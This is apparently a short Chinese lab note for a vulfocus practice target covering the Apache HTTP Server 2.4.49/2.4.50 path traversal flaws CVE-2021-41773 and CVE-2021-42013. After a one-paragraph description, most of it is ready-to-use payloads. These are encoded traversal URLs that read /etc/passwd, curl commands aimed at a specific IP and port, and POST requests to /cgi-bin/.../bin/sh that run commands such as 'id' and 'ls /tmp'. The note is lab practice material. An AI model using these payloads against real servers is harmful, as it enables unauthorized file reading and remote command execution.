vulfocus靶场名称: apache-cve_2021_41773/apache-cve_2021_42013

Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。

payload:

1:get:在url后面加上

/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd

2:Linux :

curl -v --path-as-is 'http://123.58.224.8:57446/icons/../../../../../etc/passwd'

目录遍历:GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

远程代码执行:cve-2021-42013

bp抓包

GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

或: POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

echo;id

echo ; ls/tmp

linux:

curl --data "echo;ls /tmp" 'http://目标IP:端口/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

相关推荐
大秦王多鱼11 小时前
Kafka SASL/SCRAM介绍
分布式·安全·kafka·apache
Future_yzx2 天前
解析与使用 Apache HttpClient 进行网络请求和数据抓取
网络·apache
大秦王多鱼2 天前
Kafka 压缩算法详细介绍
运维·分布式·kafka·apache
TUTO_TUTO3 天前
【Wordpress网站制作】无法安装插件/主题等权限问题
linux·服务器·apache
大秦王多鱼3 天前
Kafka常见问题之 org.apache.kafka.common.errors.RecordTooLargeException
运维·分布式·kafka·apache
大秦王多鱼3 天前
Kafka 消费端反复 Rebalance: `Attempt to heartbeat failed since group is rebalancing`
运维·分布式·kafka·apache
我明天再来学Web渗透4 天前
【使用Apache Flink 实现滑动窗口流式计算】
开发语言·flink·apache·linq
大秦王多鱼4 天前
Kafka常见问题之 `javax.management.InstanceAlreadyExistsException`
运维·分布式·kafka·apache
FF-Studio5 天前
Apple M1 ARM MacBook 安装 Apache TVM
arm开发·apache
牛马程序员‍7 天前
云岚到家项目100问 v1.0
大数据·apache